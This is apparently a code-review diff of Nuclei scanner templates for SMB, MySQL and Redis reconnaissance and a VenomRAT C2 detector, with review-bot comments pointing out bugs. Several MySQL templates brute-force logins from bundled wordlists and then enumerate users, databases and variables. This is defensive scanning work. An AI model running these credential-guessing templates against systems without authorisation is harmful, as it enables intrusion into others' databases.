SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/smb-enum-domains.html
metadata:
verified: true
max-request: 1
shodan-query: port:445
tags: js,network,smb,enum
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- "len(DNSDomainName) != 0"
extractors:
- type: json
internal: true
name: DNSDomainName
json:
- '.DNSDomainName'
- type: json
json:
- '"DomainName: "+ .DNSDomainName '
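Review bot: `description:` discusses reconnaissance in the abstract (`security professionals or attackers attempt to gather information`) instead of stating what the check does: read `DNSDomainName` from the SMBv2 negotiation metadata returned by `ListSMBv2Metadata` and report it. The second JSON extractor expression `'"DomainName: "+ .DNSDomainName '` has a trailing space inside the quotes; trim it. The matcher `len(DNSDomainName) != 0` depends on the `internal: true` extractor of the same name having populated that variable; a short comment on that dependency would help the next editor.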

View File

@ -0,0 +1,158 @@
id: smb-os-detect
info:
name: SMB Operating System - Detect
author: pussycat0x
severity: info
description: |
Detect Operating System
reference:
- https://nmap.org/nsedoc/scripts/smb-os-discovery.html
metadata:
shodan-query: "port:445"
tags: js,network,smb,enum,os
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ListSMBv2Metadata(Host, Port);
if (response.OSVersion === "6.3.9600") {
osInfo = "Windows 8.1";
} else if (response.OSVersion === "3.10.511") {
osInfo = "Windows NT 3.1";
} else if (response.OSVersion === "3.50.807") {
osInfo = "Windows NT 3.5";
} else if (response.OSVersion === "3.10.528") {
osInfo = "Windows NT 3.1, Service Pack 3";
} else if (response.OSVersion === "3.51.1057") {
osInfo = "Windows NT 3.51";
} else if (response.OSVersion === "4.00.950") {
osInfo = "Windows 95";
} else if (response.OSVersion === "4.00.950A") {
osInfo = "Windows 95 OEM Service Release 1";
} else if (response.OSVersion === "4.00.950B") {
osInfo = "Windows 95 OEM Service Release 2";
} else if (response.OSVersion === "4.0.1381") {
osInfo = "Windows NT 4.0";
} else if (response.OSVersion === "4.00.950B") {
osInfo = "Windows 95 OEM Service Release 2.1";
} else if (response.OSVersion === "4.00.950C") {
osInfo = "OEM Service Release 2.5";
} else if (response.OSVersion === "4.10.1998") {
osInfo = "Windows 98";
} else if (response.OSVersion === "4.10.2222") {
osInfo = "Windows 98 Second Edition (SE)";
} else if (response.OSVersion === "5.0.2195") {
osInfo = "Windows 2000";
} else if (response.OSVersion === "4.90.3000") {
osInfo = "Windows Me";
} else if (response.OSVersion === "5.1.2600") {
osInfo = "Windows XP";
} else if (response.OSVersion === "5.1.2600.1105-1106") {
osInfo = "Windows XP, Service Pack 1";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003";
} else if (response.OSVersion === "5.1.2600.2180") {
osInfo = "Windows XP, Service Pack 2";
} else if (response.OSVersion === "5.2.3790.1180") {
osInfo = "Windows Server 2003, Service Pack 1";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003 R2";
} else if (response.OSVersion === "6.0.6000") {
osInfo = "Windows Vista";
} else if (response.OSVersion === "5.2.3790") {
osInfo = "Windows Server 2003, Service Pack 2";
} else if (response.OSVersion === "5.2.4500") {
osInfo = "Windows Home Server";
} else if (response.OSVersion === "6.0.6001") {
osInfo = "Windows Vista, Service Pack 1";
} else if (response.OSVersion === "6.0.6001") {
osInfo = "Windows Server 2008";
} else if (response.OSVersion === "5.1.2600") {
osInfo = "Windows XP, Service Pack 3";
} else if (response.OSVersion === "6.0.6002") {
osInfo = "Windows Vista, Service Pack 2";
} else if (response.OSVersion === "6.0.6002") {
osInfo = "Windows Server 2008, Service Pack 2";
} else if (response.OSVersion === "6.1.7600") {
osInfo = "Windows 7";
} else if (response.OSVersion === "6.1.7600") {
osInfo = "Windows Server 2008 R2";
} else if (response.OSVersion === "6.1.7601") {
osInfo = "Windows 7, Service Pack 1";
} else if (response.OSVersion === "6.1.7601") {
osInfo = "Windows Server 2008 R2, Service Pack ";
} else if (response.OSVersion === "6.1.8400") {
osInfo = "Windows Home Server 2011";
} else if (response.OSVersion === "6.2.9200") {
osInfo = "Windows Server 2012";
} else if (response.OSVersion === "6.2.9200") {
osInfo = "Windows 8";
} else if (response.OSVersion === "6.3.9600") {
osInfo = "Windows 8.1";
} else if (response.OSVersion === "6.3.9600") {
osInfo = "Windows Server 2012 R2";
} else if (response.OSVersion === "10.0.10240") {
osInfo = "Windows 10, Version 1507";
} else if (response.OSVersion === "10.0.10586") {
osInfo = "Windows 10, Version 1511";
} else if (response.OSVersion === "10.0.14393") {
osInfo = "Windows 10, Version 1607";
} else if (response.OSVersion === "10.0.14393") {
osInfo = "Windows Server 2016, Version 1607";
} else if (response.OSVersion === "10.0.15063") {
osInfo = "Windows 10, Version 1703";
} else if (response.OSVersion === "10.0.16299") {
osInfo = "Windows 10, Version 1709";
} else if (response.OSVersion === "10.0.17134") {
osInfo = "Windows 10, Version 1803";
} else if (response.OSVersion === "10.0.17763") {
osInfo = "Windows Server 2019, Version 1809";
} else if (response.OSVersion === "10.0.17763") {
osInfo = "Windows 10, Version 1809";
} else if (response.OSVersion === "6.0.6003") {
osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887";
} else if (response.OSVersion === "10.0.18362") {
osInfo = "Windows 10, Version 1903";
} else if (response.OSVersion === "10.0.18363") {
osInfo = "Windows 10, Version 1909";
} else if (response.OSVersion === "10.0.18363") {
osInfo = "Windows Server, Version 1909";
} else if (response.OSVersion === "10.0.19041") {
osInfo = "Windows 10, Version 2004";
} else if (response.OSVersion === "10.0.19041") {
osInfo = "Windows Server, Version 2004";
} else if (response.OSVersion === "10.0.19042") {
osInfo = "Windows 10, Version 20H2";
} else if (response.OSVersion === "10.0.19042") {
osInfo = "Windows Server, Version 20H2";
} else if (response.OSVersion === "10.0.19043") {
osInfo = "Windows 10, Version 21H1";
} else if (response.OSVersion === "10.0.20348") {
osInfo = "Windows Server 2022, Version 21H2";
} else if (response.OSVersion === "10.0.22000") {
osInfo = "Windows 11, Version 21H2";
} else if (response.OSVersion === "10.0.19044") {
osInfo = "Windows 10, Version 21H2";
} else if (response.OSVersion === "10.0.22621") {
osInfo = "Windows 11, Version 22H2";
} else if (response.OSVersion === "10.0.19045") {
osInfo = "Windows 10, Version 22H2";
} else if (response.OSVersion === "10.0.25398") {
osInfo = "Windows Server, Version 23H2";
} else if (response.OSVersion === "10.0.22631") {
osInfo = "Windows 11, Version 23H2";
} else if (response.OSVersion !== "0") {
osInfo = response.OSVersion;
}
osInfo;
args:
Host: "{{Host}}"
Port: "445"
extractors:
- type: dsl
dsl:
- response
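Review bot: the `if`/`else if` chain repeats keys, and in a chain only the first match fires, so the later branches are dead code: `"6.3.9600"` at the top yields `Windows 8.1`, and the later `Windows 8.1` and `Windows Server 2012 R2` branches for the same value never run; the same applies to `"5.2.3790"` (three branches), `"4.00.950B"`, `"5.1.2600"`, `"6.0.6001"`, `"6.0.6002"`, `"6.1.7600"`, `"6.1.7601"`, `"6.2.9200"`, `"10.0.14393"`, `"10.0.17763"`, `"10.0.18363"`, `"10.0.19041"` and `"10.0.19042"`. Several of those builds are genuinely shared by a client and a server release (`10.0.17763` is both Windows 10 1809 and Server 2019), so the build alone cannot separate them; a lookup object keyed by build with a combined label (`"Windows 10 1809 / Server 2019"`) has no dead branches and states the ambiguity honestly. `osInfo` is never declared and is only assigned inside the branches; when `response.OSVersion` is `"0"` no branch runs and the final `osInfo;` reads an undeclared identifier, which throws a ReferenceError, so add `var osInfo = "";` before the chain. `"Windows Server 2008 R2, Service Pack "` is missing its number.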

View File

@ -0,0 +1,28 @@
id: smb-version-detect
info:
name: SMB Version - Detection
author: pussycat0x
severity: info
description: |
SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities.
metadata:
shodan-query: "port:445"
tags: js,network,smb,enum
javascript:
- code: |
let m = require("nuclei/smb");
let c = m.SMBClient();
let response = c.ConnectSMBInfoMode(Host, Port);
to_json(response);
args:
Host: "{{Host}}"
Port: "445"
extractors:
- type: json
name: smb-version
json:
- '.Version.VerString'

View File

@ -0,0 +1,44 @@
id: mysql-db-enum
info:
name: MySQL Database - Enumeration
author: pussycat0x
severity: high
metadata:
shodan-query: port:3306
tags: js,mssql,network,enum,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let result = c.ConnectWithDB(Host,Port,User,Pass,dbName);
result;
args:
Host: "{{Host}}"
Port: "3306"
dbName: "{{db}}"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
stop-at-first-match: true
payloads:
db:
- information_schema
- performance_schema
- mysql
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and
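Review bot: `tags: js,mssql,network,enum,fuzz` says `mssql` for a template whose `id`, `require('nuclei/mysql')` and `Port: "3306"` are all MySQL; change it to `mysql` (the same slip appears in `mysql-empty-password`). The template has no `description:` or `reference:`; state that it authenticates with the wordlist pairs and reports when a connection scoped to `information_schema`, `performance_schema` or `mysql` succeeds, and that `severity: high` reflects guessable credentials rather than the database names themselves.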

View File

@ -0,0 +1,44 @@
id: mysql-default-login
info:
name: MySQL - Default Login
author: DhiyaneshDk,pussycat0x,ritikchaddha
severity: high
description: |
A MySQL service was accessed with easily guessed credentials.
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,default-login,network,fuzz
javascript:
- pre-condition: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.IsMySQL(Host, Port);
code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.Connect(Host,Port,Username,Password)
args:
Host: "{{Host}}"
Port: "3306"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and
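Review bot: `code:` calls `c.Connect(Host,Port,Username,Password)` but `args:` defines `User` and `Pass`, not `Username` and `Password`, so both identifiers are undefined when the script runs and the connect call never sees the payload values; rename the arguments or the call so they agree (the `mysql-empty-password` template in this commit uses `User`/`Pass` in both places).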

View File

@ -0,0 +1,45 @@
id: mysql-show-variables
info:
name: MySQL - Show Variables
author: DhiyaneshDk
severity: high
description: Attempts to show all variables on a MySQL server.
reference:
- https://nmap.org/nsedoc/scripts/mysql-variables.html
metadata:
shodan-query: port:3306
tags: js,mysql,network,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
log(to_json(response));
args:
Host: "{{Host}}"
Port: "3306"
User: "{{usernames}}"
Pass: "{{passwords}}"
Query: "show variables;"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- '.Rows[].Variable_name'
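Review bot: the script's last statement is `log(to_json(response));`, so the value handed back to the engine is the result of `log(...)`, not the JSON document itself (unless `log` echoes its argument, which nothing here guarantees); the `part: response` JSON extractor for `.Rows[].Variable_name` then has nothing to parse. End the script with `to_json(response);` as the `mysql-load-file`, `mysql-user-enum` and `mysql-show-databases` templates do, keeping the `log` call on its own line if the debug output is wanted.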

View File

@ -0,0 +1,47 @@
id: mysql-user-enum
info:
name: MySQL - User Enumeration
author: pussycat0x
severity: high
description: |
Attempts to list all users on a MySQL server.
reference:
- https://nmap.org/nsedoc/scripts/mysql-users.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,enum,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
to_json(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: "SELECT DISTINCT user FROM mysql.user;"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- '.Rows[].user'
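Review bot: the only matcher is `success == true`, which is satisfied by any successful login even when `SELECT DISTINCT user FROM mysql.user;` returns nothing (the query needs read access to `mysql.user`, which a low-privileged account lacks), so the template can report "User Enumeration" without having enumerated anything; add a second condition such as `contains(response, "user")` with `condition: and` so it only fires when rows came back. As with the other wordlist-driven templates in this commit, the `description` should state that credentials are taken from the bundled `usernames`/`passwords` wordlists.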

@ -0,0 +1,41 @@
id: mysql-empty-password
info:
name: MySQL - Empty Password
author: DhiyaneshDk
severity: high
description: |
Checks for MySQL servers with an empty password for root or anonymous.
metadata:
shodan-query: port:3306
tags: js,mssql,network
javascript:
- pre-condition: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.IsMySQL(Host, Port);
code: |
var m = require("nuclei/mysql");
var c = m.MySQLClient();
c.Connect(Host,Port,User,Pass)
args:
Host: "{{Host}}"
Port: "3306"
User: "{{username}}"
Pass: " "
payloads:
usernames:
- root
- anonymous
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "response == true"
- "success == true"
condition: and
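Review bot: three defects in this hunk. `User: "{{username}}"` references a payload named `username`, but the payload key is `usernames`, so the placeholder never resolves; `Pass: " "` is a single space, not an empty password, so the check tests the wrong credential; and `tags: js,mssql,network` says `mssql` for a MySQL template. Suggested: `User: "{{usernames}}"`, `Pass: ""`, `tags: js,mysql,network`.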

@ -0,0 +1,45 @@
id: mysql-show-databases
info:
name: MySQL - Show Databases
author: DhiyaneshDk
severity: high
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
shodan-query: port:3306
verified: true
tags: js,mysql,network,fuzz
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
to_json(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: "show databases;"
User: "{{usernames}}"
Pass: "{{passwords}}"
threads: 10
attack: pitchfork
payloads:
usernames: helpers/wordlists/mysql-users.txt
passwords: helpers/wordlists/mysql-passwords.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "success == true"
extractors:
- type: json
part: response
json:
- .Rows[] | .Database
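Review bot: `info` has no `description`, unlike the other MySQL templates in this commit; add a one-liner such as "Attempts to list all databases on a MySQL server using credentials from the bundled wordlists." The JSON extractor `- .Rows[] | .Database` is also written differently from the quoted `'.Rows[].Variable_name'` / `'.Rows[].user'` form used in the sibling templates; `'.Rows[].Database'` is equivalent and keeps the files consistent.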

@ -0,0 +1,39 @@
id: redis-info
info:
name: Redis Info - Detect
author: DhiyaneshDK
severity: info
description: |
Retrieves information (such as version number and architecture) from a Redis key-value store.
reference:
- https://nmap.org/nsedoc/scripts/redis-info.html
metadata:
max-request: 1
shodan-query: product:"redis"
tags: js,redis,network
javascript:
- code: |
const redis = require('nuclei/redis');
const info = redis.GetServerInfo(Host,Port);
Export(info);
args:
Host: "{{Host}}"
Port: "6379"
extractors:
- type: regex
part: response
regex:
- redis_version:(\d+\.\d+\.\d+)
- os:(.*?)\\r\\n
- arch_bits:(\d+)\s+bits
- process_id:(\d+)
- used_cpu_sys:(\d+\.\d+)
- used_cpu_user:(\d+\.\d+)
- connected_clients:(\d+)
- connected_slaves:(\d+)
- used_memory_human:(\d+\.\d+[KMGTPEZY]?)
- role:(\w+)
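Review bot: the `os:` extractor regex `os:(.*?)\\r\\n` is the only pattern in the list with doubled backslashes; a YAML plain scalar does no escape processing, so the regex engine receives `\\r\\n`, which matches a literal backslash-r-backslash-n and only works if `Export(info)` serialises the INFO text with escaped line endings. Verify against a real response and use `os:(.*?)\r\n` or, more robustly, `os:([^\r\n]+)`. `used_memory_human:(\d+\.\d+[KMGTPEZY]?)` also requires a decimal point and omits the `B` unit, so small values such as `912B` do not extract; `used_memory_human:(\d+(?:\.\d+)?[BKMGTPEZY]?)` covers both forms.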

@ -0,0 +1,29 @@
id: redis-require-auth
info:
name: Redis Require Authentication - Detect
author: DhiyaneshDK
severity: info
description: |
IsAuthenticated checks if the redis server requires authentication
reference:
- https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated
metadata:
max-request: 1
shodan-query: product:"redis"
tags: js,redis,network
javascript:
- code: |
const redis = require('nuclei/redis');
const isAuthenticated = redis.IsAuthenticated(Host,Port);
Export(isAuthenticated);
args:
Host: "{{Host}}"
Port: "6379"
matchers:
- type: dsl
dsl:
- "success == true"
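Review bot: the matcher `success == true` only checks that `redis.IsAuthenticated(Host,Port)` ran without error, not what it returned, so the template fires on every reachable Redis whether or not authentication is required; match on the exported value as well, e.g. `- "response == true"` together with `- "success == true"` under `condition: and`, as the MySQL login templates in this commit do. The `description` is also lifted from the module docs ("IsAuthenticated checks if ..."); reword it to describe the finding, e.g. "Detects whether a Redis server requires authentication."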

@ -0,0 +1,38 @@
id: smb2-server-time
info:
name: SMB2 Server Time - Detection
author: DhiyaneshDK
severity: info
description: |
Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.
reference:
- https://nmap.org/nsedoc/scripts/smb2-time.html
metadata:
shodan-query: "port:445"
verified: true
tags: js,network,smb,enum
javascript:
- code: |
var m = require("nuclei/smb");
var c = m.SMBClient();
var response = c.ConnectSMBInfoMode(Host,Port);
var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString();
var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString();
var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime;
result
args:
Host: "{{Host}}"
Port: "445"
matchers:
- type: dsl
dsl:
- success
extractors:
- type: dsl
dsl:
- response
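Review bot: `new Date(response.NegotiationLog.SystemTime * 1000)` assumes `SystemTime` and `ServerStartTime` are Unix epoch seconds; on the wire the SMB2 NEGOTIATE response carries both as FILETIME (100-nanosecond intervals since 1601-01-01), and a FILETIME multiplied by 1000 is far outside the JavaScript `Date` range, so `toISOString()` would throw a RangeError unless the `nuclei/smb` module already converts the fields. Confirm the units against a live host, and guard the access with a check that `response.NegotiationLog` exists so a failed negotiation leaves `success` false instead of throwing. The `description` ("Trying to retrieve the present date ...") should be a statement, e.g. "Retrieves the current system time and the start time of an SMB2 server."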

26
ssl/c2/venomrat.yaml Normal file
@ -0,0 +1,26 @@
id: venomrat
info:
name: VenomRAT - Detect
author: pussycat0x
severity: info
reference:
- https://twitter.com/v0lundr_/status/1727277517659353297
metadata:
verified: "true"
max-request: 1
fofa-query: cert.issuer.cn="VenomRAT Server"
tags: c2,ir,osint,malware,ssl,venomrat
ssl:
- address: "{{Host}}:{{Port}}"
matchers:
- type: word
part: issuer_cn
words:
- "VenomRAT Server"
extractors:
- type: json
json:
- ".issuer_cn"
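Review bot: `verified: "true"` is a quoted string while every other template in this commit uses the bare boolean `verified: true`; use the boolean for consistency with the metadata schema. A `description` is also missing; a line such as "Detects VenomRAT C2 servers by the `VenomRAT Server` issuer CN in the TLS certificate" documents what the `issuer_cn` word matcher keys on.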